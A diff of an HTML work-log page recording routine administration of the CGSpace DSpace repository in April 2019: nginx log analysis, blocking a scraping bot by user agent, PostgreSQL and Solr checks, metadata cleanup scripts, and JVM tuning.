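</ul>
<pre tabindex="0"><code>$ http &#39;https://pub.orcid.org/v2.1/0000-0002-1825-0097/person&#39; Accept:application/json | jq -r &#39;.name | .[&#34;given-names&#34;].value + &#34; &#34; + .[&#34;family-name&#34;].value&#39;
Josiah Carberry
</code></pre>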
@ -201,7 +201,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<li>After that I added the XML formatting, formatted the file with tidy, and sorted the names in vim</li>
<li>One user&rsquo;s name has changed so I will update those using my <code>fix-metadata-values.py</code> script:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-04-03-update-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -m 240 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-04-03-update-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.creator.id -m 240 -t correct -d
</code></pre><ul>
<li>I created a pull request and merged the changes to the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/417">#417</a>)</li>
<li>A few days ago I noticed some weird update process for the statistics-2018 Solr core and I see it&rsquo;s still going:</li>
@ -210,7 +210,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</code></pre><ul>
<li>Interestingly, there are 5666 occurrences, and they are mostly for the 2018 core:</li>
</ul>
<pre tabindex="0"><code>$ grep 'org.dspace.statistics.SolrLogger @ Updating' /home/cgspace.cgiar.org/log/dspace.log.2019-04-03 | awk '{print $11}' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;org.dspace.statistics.SolrLogger @ Updating&#39; /home/cgspace.cgiar.org/log/dspace.log.2019-04-03 | awk &#39;{print $11}&#39; | sort | uniq -c
1
3 http://localhost:8081/solr//statistics-2017
5662 http://localhost:8081/solr//statistics-2018
@ -222,7 +222,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<li>Uptime Robot reported that CGSpace (linode18) went down tonight</li>
<li>I see there are lots of PostgreSQL connections:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
10 dspaceCli
250 dspaceWeb
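# a finer-grained view of the same pool (a sketch), splitting connections by state:
$ psql -c &#39;SELECT application_name, state, count(*) FROM pg_stat_activity GROUP BY 1, 2 ORDER BY 3 DESC;&#39;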
@ -257,7 +257,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</li>
<li>Linode sent an alert that there was high CPU usage this morning on CGSpace (linode18) and these were the top IPs in the webserver access logs around the time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;06/Apr/2019:(06|07|08|09)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;06/Apr/2019:(06|07|08|09)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
222 18.195.78.144
245 207.46.13.58
303 207.46.13.194
@ -268,7 +268,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
1803 66.249.79.59
2834 2a01:4f8:140:3192::2
9623 45.5.184.72
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &quot;06/Apr/2019:(06|07|08|09)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &#34;06/Apr/2019:(06|07|08|09)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
31 66.249.79.62
41 207.46.13.210
42 40.77.167.66
@ -287,14 +287,14 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<li>Their user agent is the one I added to the badbots list in nginx last week: &ldquo;GuzzleHttp/6.3.3 curl/7.47.0 PHP/7.0.30-0ubuntu0.16.04.1&rdquo;</li>
<li>They made 22,000 requests to Discover on this collection today alone (and it&rsquo;s only 11AM):</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &quot;06/Apr/2019&quot; | grep 45.5.184.72 | grep -oE '/handle/[0-9]+/[0-9]+/discover' | sort | uniq -c
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;06/Apr/2019&#34; | grep 45.5.184.72 | grep -oE &#39;/handle/[0-9]+/[0-9]+/discover&#39; | sort | uniq -c
22077 /handle/10568/72970/discover
</code></pre><ul>
<li>Yesterday they made 43,000 requests and we actually blocked most of them:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &quot;05/Apr/2019&quot; | grep 45.5.184.72 | grep -oE '/handle/[0-9]+/[0-9]+/discover' | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#34;05/Apr/2019&#34; | grep 45.5.184.72 | grep -oE &#39;/handle/[0-9]+/[0-9]+/discover&#39; | sort | uniq -c
43631 /handle/10568/72970/discover
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &quot;05/Apr/2019&quot; | grep 45.5.184.72 | grep -E '/handle/[0-9]+/[0-9]+/discover' | awk '{print $9}' | sort | uniq -c
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#34;05/Apr/2019&#34; | grep 45.5.184.72 | grep -E &#39;/handle/[0-9]+/[0-9]+/discover&#39; | awk &#39;{print $9}&#39; | sort | uniq -c
142 200
43489 503
</code></pre><ul>
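<li>The HTTP 503s come from matching their user agent in nginx; a minimal sketch of that kind of rule (the actual patterns and structure of our config differ):</li>
</ul>
<pre tabindex="0"><code>map $http_user_agent $ua_badbot {
    default      0;
    ~*GuzzleHttp 1;
}

server {
    # ... rest of the vhost ...
    if ($ua_badbot) {
        return 503;
    }
}
</code></pre>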
@ -315,53 +315,53 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&amp;fq=statistics_type%3Aview&amp;fq=bundleName%3AORIGINAL&amp;fq=dateYearMonth%3A2019-03&amp;rows=0&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&amp;fq=statistics_type%3Aview&amp;fq=bundleName%3AORIGINAL&amp;fq=dateYearMonth%3A2019-03&amp;rows=0&amp;wt=json&amp;indent=true&#39;
{
&quot;response&quot;: {
&quot;docs&quot;: [],
&quot;numFound&quot;: 96925,
&quot;start&quot;: 0
&#34;response&#34;: {
&#34;docs&#34;: [],
&#34;numFound&#34;: 96925,
&#34;start&#34;: 0
},
&quot;responseHeader&quot;: {
&quot;QTime&quot;: 1,
&quot;params&quot;: {
&quot;fq&quot;: [
&quot;statistics_type:view&quot;,
&quot;bundleName:ORIGINAL&quot;,
&quot;dateYearMonth:2019-03&quot;
&#34;responseHeader&#34;: {
&#34;QTime&#34;: 1,
&#34;params&#34;: {
&#34;fq&#34;: [
&#34;statistics_type:view&#34;,
&#34;bundleName:ORIGINAL&#34;,
&#34;dateYearMonth:2019-03&#34;
],
&quot;indent&quot;: &quot;true&quot;,
&quot;q&quot;: &quot;type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)&quot;,
&quot;rows&quot;: &quot;0&quot;,
&quot;wt&quot;: &quot;json&quot;
&#34;indent&#34;: &#34;true&#34;,
&#34;q&#34;: &#34;type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)&#34;,
&#34;rows&#34;: &#34;0&#34;,
&#34;wt&#34;: &#34;json&#34;
},
&quot;status&quot;: 0
&#34;status&#34;: 0
}
}
</code></pre><ul>
<li>Strangely I don&rsquo;t see many hits in 2019-04:</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&amp;fq=statistics_type%3Aview&amp;fq=bundleName%3AORIGINAL&amp;fq=dateYearMonth%3A2019-04&amp;rows=0&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&amp;fq=statistics_type%3Aview&amp;fq=bundleName%3AORIGINAL&amp;fq=dateYearMonth%3A2019-04&amp;rows=0&amp;wt=json&amp;indent=true&#39;
{
&quot;response&quot;: {
&quot;docs&quot;: [],
&quot;numFound&quot;: 38,
&quot;start&quot;: 0
&#34;response&#34;: {
&#34;docs&#34;: [],
&#34;numFound&#34;: 38,
&#34;start&#34;: 0
},
&quot;responseHeader&quot;: {
&quot;QTime&quot;: 1,
&quot;params&quot;: {
&quot;fq&quot;: [
&quot;statistics_type:view&quot;,
&quot;bundleName:ORIGINAL&quot;,
&quot;dateYearMonth:2019-04&quot;
&#34;responseHeader&#34;: {
&#34;QTime&#34;: 1,
&#34;params&#34;: {
&#34;fq&#34;: [
&#34;statistics_type:view&#34;,
&#34;bundleName:ORIGINAL&#34;,
&#34;dateYearMonth:2019-04&#34;
],
&quot;indent&quot;: &quot;true&quot;,
&quot;q&quot;: &quot;type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)&quot;,
&quot;rows&quot;: &quot;0&quot;,
&quot;wt&quot;: &quot;json&quot;
&#34;indent&#34;: &#34;true&#34;,
&#34;q&#34;: &#34;type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)&#34;,
&#34;rows&#34;: &#34;0&#34;,
&#34;wt&#34;: &#34;json&#34;
},
&quot;status&quot;: 0
&#34;status&#34;: 0
}
}
</code></pre><ul>
@ -419,8 +419,8 @@ X-XSS-Protection: 1; mode=block
</code></pre><ul>
<li>And from the server side, the nginx logs show:</li>
</ul>
<pre tabindex="0"><code>78.x.x.x - - [07/Apr/2019:01:38:35 -0700] &quot;GET /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1&quot; 200 68078 &quot;-&quot; &quot;HTTPie/1.0.2&quot;
78.x.x.x - - [07/Apr/2019:01:39:01 -0700] &quot;HEAD /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1&quot; 200 0 &quot;-&quot; &quot;HTTPie/1.0.2&quot;
<pre tabindex="0"><code>78.x.x.x - - [07/Apr/2019:01:38:35 -0700] &#34;GET /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1&#34; 200 68078 &#34;-&#34; &#34;HTTPie/1.0.2&#34;
78.x.x.x - - [07/Apr/2019:01:39:01 -0700] &#34;HEAD /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1&#34; 200 0 &#34;-&#34; &#34;HTTPie/1.0.2&#34;
</code></pre><ul>
<li>So the <em>size</em> of the transfer is definitely smaller with a HEAD, but I need to wait to see if these requests show up in Solr
<ul>
@ -448,26 +448,26 @@ X-XSS-Protection: 1; mode=block
<li>According to the <a href="https://wiki.lyrasis.org/display/DSDOC5x/SOLR+Statistics">DSpace 5.x Solr documentation</a> the default commit time is after 15 minutes or 10,000 documents (see <code>solrconfig.xml</code>)</li>
<li>I looped some GET and HEAD requests to a bitstream on my local instance (see the sketch below) and after some time I see that they <em>do</em> register as downloads (even though they are internal):</li>
</ul>
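<ul>
<li>The loop was something like this (a sketch using httpie against a local copy of the Spore PDF):</li>
</ul>
<pre tabindex="0"><code>$ for i in $(seq 1 100); do
    http --print h GET &#39;http://localhost:8080/bitstream/handle/10568/100289/Spore-192-EN-web.pdf&#39; &amp;&gt;/dev/null
    http --print h HEAD &#39;http://localhost:8080/bitstream/handle/10568/100289/Spore-192-EN-web.pdf&#39; &amp;&gt;/dev/null
done
</code></pre>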
<pre tabindex="0"><code>$ http --print b 'http://localhost:8080/solr/statistics/select?q=type%3A0+AND+time%3A2019-04-07*&amp;fq=statistics_type%3Aview&amp;fq=isInternal%3Atrue&amp;rows=0&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8080/solr/statistics/select?q=type%3A0+AND+time%3A2019-04-07*&amp;fq=statistics_type%3Aview&amp;fq=isInternal%3Atrue&amp;rows=0&amp;wt=json&amp;indent=true&#39;
{
&quot;response&quot;: {
&quot;docs&quot;: [],
&quot;numFound&quot;: 909,
&quot;start&quot;: 0
&#34;response&#34;: {
&#34;docs&#34;: [],
&#34;numFound&#34;: 909,
&#34;start&#34;: 0
},
&quot;responseHeader&quot;: {
&quot;QTime&quot;: 0,
&quot;params&quot;: {
&quot;fq&quot;: [
&quot;statistics_type:view&quot;,
&quot;isInternal:true&quot;
&#34;responseHeader&#34;: {
&#34;QTime&#34;: 0,
&#34;params&#34;: {
&#34;fq&#34;: [
&#34;statistics_type:view&#34;,
&#34;isInternal:true&#34;
],
&quot;indent&quot;: &quot;true&quot;,
&quot;q&quot;: &quot;type:0 AND time:2019-04-07*&quot;,
&quot;rows&quot;: &quot;0&quot;,
&quot;wt&quot;: &quot;json&quot;
&#34;indent&#34;: &#34;true&#34;,
&#34;q&#34;: &#34;type:0 AND time:2019-04-07*&#34;,
&#34;rows&#34;: &#34;0&#34;,
&#34;wt&#34;: &#34;json&#34;
},
&quot;status&quot;: 0
&#34;status&#34;: 0
}
}
</code></pre><ul>
@ -501,7 +501,7 @@ X-XSS-Protection: 1; mode=block
</code></pre><ul>
<li>According to the server logs there is actually not much going on right now:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &quot;07/Apr/2019:(18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &#34;07/Apr/2019:(18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
118 18.195.78.144
128 207.46.13.219
129 167.114.64.100
@ -512,7 +512,7 @@ X-XSS-Protection: 1; mode=block
363 40.77.167.21
740 2a01:4f8:140:3192::2
4823 45.5.184.72
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &quot;07/Apr/2019:(18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &#34;07/Apr/2019:(18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
3 66.249.79.62
3 66.249.83.196
4 207.46.13.86
@ -529,7 +529,7 @@ X-XSS-Protection: 1; mode=block
<li><code>2408:8214:7a00:868f:7c1e:e0f3:20c6:c142</code> is some stupid Chinese bot making malicious POST requests</li>
<li>There are free database connections in the pool:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
7 dspaceCli
23 dspaceWeb
@ -560,7 +560,7 @@ X-XSS-Protection: 1; mode=block
<li>See the <a href="https://github.com/OpenRefine/OpenRefine/wiki/Variables#recon">OpenRefine variables documentation</a> for more notes about the <code>recon</code> object</li>
<li>I also noticed a handful of errors in our current list of affiliations so I corrected them:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-04-08-fix-13-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-04-08-fix-13-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211 -t correct -d
</code></pre><ul>
<li>We should create a new list of affiliations to update our controlled vocabulary again</li>
<li>I dumped a list of the top 1500 affiliations:</li>
@ -570,20 +570,20 @@ COPY 1500
</code></pre><ul>
<li>Fix a few more messed up affiliations that have return characters in them (use Ctrl-V Ctrl-M to re-create control character):</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value='International Institute for Environment and Development' WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE 'International Institute^M%';
dspace=# UPDATE metadatavalue SET text_value='Kenya Agriculture and Livestock Research Organization' WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE 'Kenya Agricultural and Livestock Research^M%';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=&#39;International Institute for Environment and Development&#39; WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE &#39;International Institute^M%&#39;;
dspace=# UPDATE metadatavalue SET text_value=&#39;Kenya Agriculture and Livestock Research Organization&#39; WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE &#39;Kenya Agricultural and Livestock Research^M%&#39;;
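-- a sketch to find any remaining values with carriage returns, without retyping the control character:
dspace=# SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value ~ E&#39;\r&#39;;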
</code></pre><ul>
<li>I noticed a bunch of subjects and affiliations that use stylized apostrophes so I will export those and then batch update them:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE '%%') to /tmp/2019-04-08-affiliations-apostrophes.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE &#39;%%&#39;) to /tmp/2019-04-08-affiliations-apostrophes.csv WITH CSV HEADER;
COPY 60
dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 57 AND text_value LIKE '%’%') to /tmp/2019-04-08-subject-apostrophes.csv WITH CSV HEADER;
dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 57 AND text_value LIKE &#39;%’%&#39;) to /tmp/2019-04-08-subject-apostrophes.csv WITH CSV HEADER;
COPY 20
</code></pre><ul>
<li>I cleaned them up in OpenRefine and then applied the fixes on CGSpace and DSpace Test:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-60-affiliations-apostrophes.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -d
$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-20-subject-apostrophes.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-60-affiliations-apostrophes.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211 -t correct -d
$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-20-subject-apostrophes.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.subject -m 57 -t correct -d
</code></pre><ul>
<li>UptimeRobot said that CGSpace (linode18) went down tonight
<ul>
@ -592,7 +592,7 @@ $ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-20-subject-apostrophes.csv -db
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
7 dspaceCli
250 dspaceWeb
@ -609,7 +609,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
<li>Linode Support still didn&rsquo;t respond to my ticket from yesterday, so I attached a new output of <code>iostat 1 10</code> and asked them to move the VM to a less busy host</li>
<li>The web server logs are not very busy:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &quot;08/Apr/2019:(17|18|19)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &#34;08/Apr/2019:(17|18|19)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
124 40.77.167.135
135 95.108.181.88
139 157.55.39.206
@ -620,7 +620,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
457 157.55.39.164
457 40.77.167.132
3822 45.5.184.72
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &quot;08/Apr/2019:(17|18|19)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &#34;08/Apr/2019:(17|18|19)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
5 129.0.79.206
5 41.205.240.21
7 207.46.13.95
@ -636,7 +636,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
<li>Linode sent an alert that CGSpace (linode18) was using 440% CPU for the last two hours this morning</li>
<li>Here are the top IPs in the web server logs around that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &quot;09/Apr/2019:(06|07|08)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &#34;09/Apr/2019:(06|07|08)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
18 66.249.79.139
21 157.55.39.160
29 66.249.79.137
@ -647,7 +647,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
1166 45.5.184.72
4251 45.5.186.2
4895 205.186.128.185
# zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &quot;09/Apr/2019:(06|07|08)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &#34;09/Apr/2019:(06|07|08)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
200 144.48.242.108
202 207.46.13.185
206 18.194.46.84
@ -665,7 +665,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
</code></pre><ul>
<li>Database connection usage looks fine:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
7 dspaceCli
11 dspaceWeb
@ -683,15 +683,15 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
<li>Abenet pointed out a possibility of validating funders against the <a href="https://support.crossref.org/hc/en-us/articles/215788143-Funder-data-via-the-API">CrossRef API</a></li>
<li>Note that if you use HTTPS and specify a contact address in the API request you are less likely to be blocked</li>
</ul>
<pre tabindex="0"><code>$ http 'https://api.crossref.org/funders?query=mercator&amp;mailto=me@cgiar.org'
<pre tabindex="0"><code>$ http &#39;https://api.crossref.org/funders?query=mercator&amp;mailto=me@cgiar.org&#39;
</code></pre><ul>
<li>Otherwise, they provide the funder data in <a href="https://www.crossref.org/services/funder-registry/">CSV and RDF format</a></li>
<li>I did a quick test with the recent IITA records against reconcile-csv in OpenRefine and it matched a few, but the ones that didn&rsquo;t match will need a human to go and do some manual checking and informed decision making&hellip;</li>
<li>If I want to write a script for this I could use the Python <a href="https://habanero.readthedocs.io/en/latest/modules/crossref.html">habanero library</a>:</li>
</ul>
<pre tabindex="0"><code>from habanero import Crossref
cr = Crossref(mailto=&quot;me@cgiar.org&quot;)
x = cr.funders(query = &quot;mercator&quot;)
cr = Crossref(mailto=&#34;me@cgiar.org&#34;)
x = cr.funders(query = &#34;mercator&#34;)
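# a sketch, assuming the standard Crossref response format: list the matching funder names
for funder in x[&#39;message&#39;][&#39;items&#39;]:
    print(funder[&#39;name&#39;])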
</code></pre><h2 id="2019-04-11">2019-04-11</h2>
<ul>
<li>Continue proofing IITA&rsquo;s last round of batch uploads from <a href="https://dspacetest.cgiar.org/handle/10568/100333">March on DSpace Test</a> (20193rd.xls)
@ -720,8 +720,8 @@ x = cr.funders(query = &quot;mercator&quot;)
</li>
<li>I captured a few general corrections and deletions for AGROVOC subjects while looking at IITA&rsquo;s records, so I applied them to DSpace Test and CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-04-11-fix-14-subjects.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspace -u dspace -p 'fuuu' -m 57 -f dc.subject -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-04-11-fix-14-subjects.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.subject -m 57 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 57 -f dc.subject -d
</code></pre><ul>
<li>Answer more questions about DOIs and Altmetric scores from WLE</li>
<li>Answer more questions about DOIs and Altmetric scores from IWMI
@ -753,7 +753,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspac
<ul>
<li>Change DSpace Test (linode19) to use the Java GC tuning from the Solr 4.10.4 startup script:</li>
</ul>
<pre tabindex="0"><code>GC_TUNE=&quot;-XX:NewRatio=3 \
<pre tabindex="0"><code>GC_TUNE=&#34;-XX:NewRatio=3 \
-XX:SurvivorRatio=4 \
-XX:TargetSurvivorRatio=90 \
-XX:MaxTenuringThreshold=8 \
@ -766,7 +766,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspac
-XX:CMSInitiatingOccupancyFraction=50 \
-XX:CMSMaxAbortablePrecleanTime=6000 \
-XX:+CMSParallelRemarkEnabled \
-XX:+ParallelRefProcEnabled&quot;
-XX:+ParallelRefProcEnabled&#34;
</code></pre><ul>
<li>I need to remember to check the Munin JVM graphs in a few days</li>
<li>It might be placebo, but the site <em>does</em> feel snappier&hellip;</li>
@ -791,14 +791,14 @@ import re
import urllib
import urllib2
handle = re.findall('[0-9]+/[0-9]+', value)
handle = re.findall(&#39;[0-9]+/[0-9]+&#39;, value)
url = 'https://cgspace.cgiar.org/rest/handle/' + handle[0]
url = &#39;https://cgspace.cgiar.org/rest/handle/&#39; + handle[0]
req = urllib2.Request(url)
req.add_header('User-agent', 'Alan Python bot')
req.add_header(&#39;User-agent&#39;, &#39;Alan Python bot&#39;)
res = urllib2.urlopen(req)
data = json.load(res)
item_id = data['id']
item_id = data[&#39;id&#39;]
return item_id
</code></pre><ul>
@ -1053,7 +1053,7 @@ TCP window size: 85.0 KByte (default)
</code></pre><ul>
<li>Apparently it happens once per request, which can be at least 1,500 times per day according to the DSpace logs on CGSpace (linode18):</li>
</ul>
<pre tabindex="0"><code>$ grep -c 'Falling back to request address' dspace.log.2019-04-20
<pre tabindex="0"><code>$ grep -c &#39;Falling back to request address&#39; dspace.log.2019-04-20
dspace.log.2019-04-20:1515
</code></pre><ul>
<li>I will fix it in <code>dspace/config/modules/oai.cfg</code></li>
@ -1098,7 +1098,7 @@ dspace.log.2019-04-20:1515
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c id,dc.identifier.uri,'dc.identifier.uri[]' ~/Downloads/2019-04-24-IITA.csv &gt; /tmp/iita.csv
<pre tabindex="0"><code>$ csvcut -c id,dc.identifier.uri,&#39;dc.identifier.uri[]&#39; ~/Downloads/2019-04-24-IITA.csv &gt; /tmp/iita.csv
</code></pre><ul>
<li>Carlos Tejo from the Land Portal had been emailing me this week to ask about the old REST API that Tsega was building in 2017
